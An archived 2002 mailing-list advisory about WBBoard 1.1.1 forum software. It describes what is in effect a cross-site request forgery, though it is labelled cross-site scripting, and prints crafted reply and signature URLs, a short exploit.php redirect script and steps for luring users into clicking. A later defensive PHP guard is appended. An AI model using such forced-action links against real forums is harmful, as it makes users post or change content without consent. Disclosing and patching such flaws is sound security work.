wbboard 1.1.1 Cross Site Scripting Vulnerability
-------------------------

Affected program    : wbboard 1.1.1 is a phpBB-like PHP forum
Vendor              : http://www.woltlab.de/
Vulnerability-Class : Cross Site Scripting (CSS)
OS specific         : No
Problem-Type        : Joke
severity            : No risk

SUMMARY

1. WBBoard allows messages to be posted like this:

   http://localhost/wbboard/reply.php?threadid=7&boardid=58&action=send&subject=check%20this%20out&message=test[IMG]http://localhost/~seazon/art/eros/236.jpg[/IMG]&signature=1

2. It allows the signature to be edited like this:

   http://localhost/wbboard/profile.php?mode=editsignature&send=1$preview=0&message=Take%20a%20deep%20breath,%20relax%20[IMG]http://localhost/~seazon/art/eros/236.jpg[/IMG]

IMPACT

A user who clicks on this link is forced to post your message in the forum :)

EXPLOIT

1. Create a script exploit.php

   exploit.php

   <?php
   // With PHP you can dynamically redirect to the same threads & boardid (parsing $HTTP_REFERER)
   header("Location: http://localhost/wbboard/reply.php?threadid=7&boardid=58&action=send&subject=check%20this%20out&message=test[IMG]http://localhost/~seazon/art/eros/236.jpg[/IMG]&signature=1"); /* Redirect browser */
   ?>

2. Register in the forum

3. Send a message like this:

   "Hey, I know how to exploit this forum [URL]http://host.com/exploit.php[/URL]"

SOLUTION

I don't think that it is necessary.

P.S.: I think that all main forums are exploitable in this way. For phpBB you must use the HTTP POST method.
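
The server-side check that stops the redirect described above, as an added example that is not part of the original post and not WoltLab's code: state-changing actions accept POST only and require a per-session token, which also covers the POST variant mentioned in the P.S. The names csrf_token, guard_action and the csrf form field are assumptions made for illustration.

```php
<?php
// Hypothetical guard for state-changing forum actions such as
// reply.php?action=send or profile.php?mode=editsignature. Not WBBoard code.

// Issue (or reuse) a random per-session token to embed in every form.
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Returns the HTTP status the handler should answer with before doing any write.
function guard_action(string $method, array $post, array $session): int
{
    // Writes are accepted over POST only, so a clicked link, a Location:
    // redirect or an [IMG] URL can no longer trigger them.
    if ($method !== 'POST') {
        return 405;
    }
    // The body must carry the session's token. Another site can make the
    // browser send the session cookie, but it cannot read the token.
    $sent = $post['csrf'] ?? '';
    $want = $session['csrf'] ?? '';
    if (!is_string($sent) || $want === '' || !hash_equals($want, $sent)) {
        return 403;
    }
    return 200;
}

// Constructed requests, run from the CLI with: php guard.php
$session = [];
$token = csrf_token($session);
$body = ['action' => 'send', 'subject' => 'check this out', 'message' => 'test'];

$cases = [
    'GET reached through a redirect' => ['GET', []],
    'cross-site POST, no token'      => ['POST', $body],
    'forum form with session token'  => ['POST', $body + ['csrf' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
    printf("%-32s -> %d\n", $label, guard_action($method, $post, $session));
}
```

In a real handler $session would be $_SESSION after session_start(), $method would be $_SERVER['REQUEST_METHOD'], and $post would be $_POST.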
This archive was generated by hypermail 2b30 : Mon Apr 15 2002 - 17:41:21 PDT